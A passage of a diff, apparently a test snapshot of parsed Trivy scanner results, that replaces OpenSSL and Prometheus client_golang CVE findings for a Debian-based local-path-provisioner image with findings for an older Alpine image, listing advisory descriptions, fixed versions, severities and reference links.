"https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - }, - { - "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-3712", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6119-1", + "value": "https://access.redhat.com/security/cve/CVE-2021-3712", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230530.txt", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0465", - "installedVersion": "1.1.1n-0+deb11u4", - "packageName": "openssl", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0465", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0465", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", - ], - }, - "category": "Vulnerability", - "description": "Applications that use a non-default option when verifying certificates may be -vulnerable to an attack from a malicious CA to circumvent certain checks. - -Invalid certificate policies in leaf certificates are silently ignored by -OpenSSL and other certificate policy checks are skipped for that certificate. -A malicious CA could use this to deliberately assert invalid certificate policies -in order to circumvent policy checking on the certificate altogether. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "Invalid certificate policies in leaf certificates are silently ignored", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0465", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0465", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "value": "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "value": "https://linux.oracle.com/cve/CVE-2021-3712.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "value": "https://linux.oracle.com/errata/ELSA-2022-9023.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://security.gentoo.org/glsa/202209-02", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://security.gentoo.org/glsa/202210-02", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0466", - "installedVersion": "1.1.1n-0+deb11u4", - "packageName": "openssl", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0466", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0466", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", - ], - }, - "category": "Vulnerability", - "description": "The function X509_VERIFY_PARAM_add0_policy() is documented to -implicitly enable the certificate policy check when doing certificate -verification. However the implementation of the function does not -enable the check which allows certificates with invalid or incorrect -policies to pass the certificate verification. - -As suddenly enabling the policy check could break existing deployments it was -decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() -function. - -Instead the applications that require OpenSSL to perform certificate -policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly -enable the policy check by calling X509_VERIFY_PARAM_set_flags() with -the X509_V_FLAG_POLICY_CHECK flag argument. - -Certificate policy checks are disabled by default in OpenSSL and are not -commonly used by applications.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "Certificate policy check not enabled", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0466", + "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0466", + "value": "https://ubuntu.com/security/notices/USN-5051-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "value": "https://ubuntu.com/security/notices/USN-5051-2", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "value": "https://ubuntu.com/security/notices/USN-5051-3", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "value": "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "value": "https://ubuntu.com/security/notices/USN-5088-1", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3712", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://www.debian.org/security/2021/dsa-4963", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "value": "https://www.openssl.org/news/secadv/20210824.txt", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://www.tenable.com/security/tns-2021-16", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://www.tenable.com/security/tns-2022-02", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-6755", - "installedVersion": "1.1.1n-0+deb11u4", - "packageName": "openssl", + "fixedVersion": "1.1.1n-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2022-0778", + "installedVersion": "1.1.1g-r0", + "packageName": "libssl1.1", "references": [ - "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", - "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", - "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", - "http://rump2007.cr.yp.to/15-shumow.pdf", - "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", - "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", - "http://www.securityfocus.com/bid/63657", - "https://access.redhat.com/security/cve/CVE-2007-6755", - "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", - "https://www.cve.org/CVERecord?id=CVE-2007-6755", - "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", + "http://seclists.org/fulldisclosure/2022/May/33", + "http://seclists.org/fulldisclosure/2022/May/35", + "http://seclists.org/fulldisclosure/2022/May/38", + "https://access.redhat.com/errata/RHSA-2022:5326", + "https://access.redhat.com/security/cve/CVE-2022-0778", + "https://bugzilla.redhat.com/2062202", + "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", + "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", + "https://errata.almalinux.org/8/ALSA-2022-5326.html", + "https://errata.rockylinux.org/RLSA-2022:4899", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", + "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", + "https://linux.oracle.com/cve/CVE-2022-0778.html", + "https://linux.oracle.com/errata/ELSA-2022-9272.html", + "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", + "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", + "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220321-0002/", + "https://security.netapp.com/advisory/ntap-20220429-0005/", + "https://support.apple.com/kb/HT213255", + "https://support.apple.com/kb/HT213256", + "https://support.apple.com/kb/HT213257", + "https://ubuntu.com/security/notices/USN-5328-1", + "https://ubuntu.com/security/notices/USN-5328-2", + "https://www.cve.org/CVERecord?id=CVE-2022-0778", + "https://www.debian.org/security/2022/dsa-5103", + "https://www.openssl.org/news/secadv/20220315.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.tenable.com/security/tns-2022-06", + "https://www.tenable.com/security/tns-2022-07", + "https://www.tenable.com/security/tns-2022-08", + "https://www.tenable.com/security/tns-2022-09", ], }, "category": "Vulnerability", - "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", + "description": "The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "Dual_EC_DRBG: weak pseudo random number generator", + "name": "openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-6755", + "value": "https://avd.aquasec.com/nvd/cve-2022-0778", }, { "type": "URL", - "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "value": "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "value": "http://seclists.org/fulldisclosure/2022/May/33", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "value": "http://seclists.org/fulldisclosure/2022/May/35", }, { "type": "URL", - "value": "http://rump2007.cr.yp.to/15-shumow.pdf", + "value": "http://seclists.org/fulldisclosure/2022/May/38", }, { "type": "URL", - "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "value": "https://access.redhat.com/errata/RHSA-2022:5326", }, { "type": "URL", - "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "value": "https://access.redhat.com/security/cve/CVE-2022-0778", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/63657", + "value": "https://bugzilla.redhat.com/2062202", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2007-6755", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", }, { "type": "URL", - "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + "value": "https://errata.almalinux.org/8/ALSA-2022-5326.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-0928", - "installedVersion": "1.1.1n-0+deb11u4", - "packageName": "openssl", - "references": [ - "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", - "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", - "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", - "http://www.osvdb.org/62808", - "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", - "https://access.redhat.com/security/cve/CVE-2010-0928", - "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", - "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", - "https://www.cve.org/CVERecord?id=CVE-2010-0928", - ], - }, - "category": "Vulnerability", - "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "openssl: RSA authentication weakness", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-0928", + "value": "https://errata.rockylinux.org/RLSA-2022:4899", }, { "type": "URL", - "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", }, { "type": "URL", - "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", }, { "type": "URL", - "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", }, { "type": "URL", - "value": "http://www.osvdb.org/62808", + "value": "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", }, { "type": "URL", - "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "value": "https://linux.oracle.com/cve/CVE-2022-0778.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-0928", + "value": "https://linux.oracle.com/errata/ELSA-2022-9272.html", }, { "type": "URL", - "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.11.1", - "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-21698", - "installedVersion": "v1.1.0", - "packageName": "github.com/prometheus/client_golang", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:8057", - "https://access.redhat.com/security/cve/CVE-2022-21698", - "https://bugzilla.redhat.com/2044628", - "https://bugzilla.redhat.com/2045880", - "https://bugzilla.redhat.com/2050648", - "https://bugzilla.redhat.com/2050742", - "https://bugzilla.redhat.com/2050743", - "https://bugzilla.redhat.com/2065290", - "https://bugzilla.redhat.com/2107342", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107376", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2107390", - "https://bugzilla.redhat.com/2107392", - "https://bugzilla.redhat.com/show_bug.cgi?id=2044628", - "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", - "https://bugzilla.redhat.com/show_bug.cgi?id=2050648", - "https://bugzilla.redhat.com/show_bug.cgi?id=2050742", - "https://bugzilla.redhat.com/show_bug.cgi?id=2050743", - "https://bugzilla.redhat.com/show_bug.cgi?id=2055349", - "https://bugzilla.redhat.com/show_bug.cgi?id=2065290", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104367", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107342", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107390", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107392", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23648", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1962", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21673", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21698", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21702", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21703", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21713", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28131", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30631", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30633", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://errata.almalinux.org/9/ALSA-2022-8057.html", - "https://errata.rockylinux.org/RLSA-2022:8057", - "https://github.com/advisories/GHSA-cg3q-j54f-5p7p", - "https://github.com/prometheus/client_golang/pull/962", - "https://github.com/prometheus/client_golang/pull/987", - "https://github.com/prometheus/client_golang/releases/tag/v1.11.1", - "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", - "https://linux.oracle.com/cve/CVE-2022-21698.html", - "https://linux.oracle.com/errata/ELSA-2022-8057.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2IK53GWZ475OQ6ENABKMJMTOBZG6LXUR/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2PFW6Q2LXXWTFRTMTRN4ZGADFRQPKJ3D/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36GUEPA5TPSC57DZTPYPBL6T7UPQ2FRH/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3L6GDN5S5QZSCFKWD3GKL2RDZQ6B4UWA/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KDETHL5XCT6RZN2BBNOCEXRZ2W3SFU3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5OGNAFVXSMTTT2UPH6CS3IH6L3KM42Q7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7V7I72LSQ3IET3QJR6QPAVGJZ4CBDLN5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AK7CJBCGERCRXYUR2EWDSSDVAQMTAZGX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FY3N7H6VSDZM37B4SKM2PFFCUWU7QYWN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HLAQRRGNSO5MYCPAXGPH2OCSHOGHSQMQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KBMVIQFKQDSSTHVVJWJ4QH6TW3JVB7XZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MH6ALXEQXIFQRQFNJ5Y2MJ5DFPIX76VN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RN7JGC2LVHPEGSJYODFUV5FEKPBVG4D7/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SASRKYHT5ZFSVMJUQUG3UAEQRJYGJKAR/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKORFJTRRDJCWBTJPISKKCVMMMJBIRLG/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", - "https://pkg.go.dev/vuln/GO-2022-0322", - "https://www.cve.org/CVERecord?id=CVE-2022-21698", - ], - }, - "category": "Vulnerability", - "description": "client_golang is the instrumentation library for Go applications in Prometheus, and the promhttp package in client_golang provides tooling around HTTP servers and clients. In client_golang prior to version 1.11.1, HTTP server is susceptible to a Denial of Service through unbounded cardinality, and potential memory exhaustion, when handling requests with non-standard HTTP methods. In order to be affected, an instrumented software must use any of \`promhttp.InstrumentHandler*\` middleware except \`RequestsInFlight\`; not filter any specific methods (e.g GET) before middleware; pass metric with \`method\` label name to our middleware; and not have any firewall/LB/proxy that filters away requests with unknown \`method\`. client_golang version 1.11.1 contains a patch for this issue. Several workarounds are available, including removing the \`method\` label name from counter/gauge used in the InstrumentHandler; turning off affected promhttp handlers; adding custom middleware before promhttp handler that will sanitize the request method given by Go http.Request; and using a reverse proxy or web application firewall, configured to only allow a limited set of methods.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "Denial of service using InstrumentHandlerCounter", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-21698", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8057", + "value": 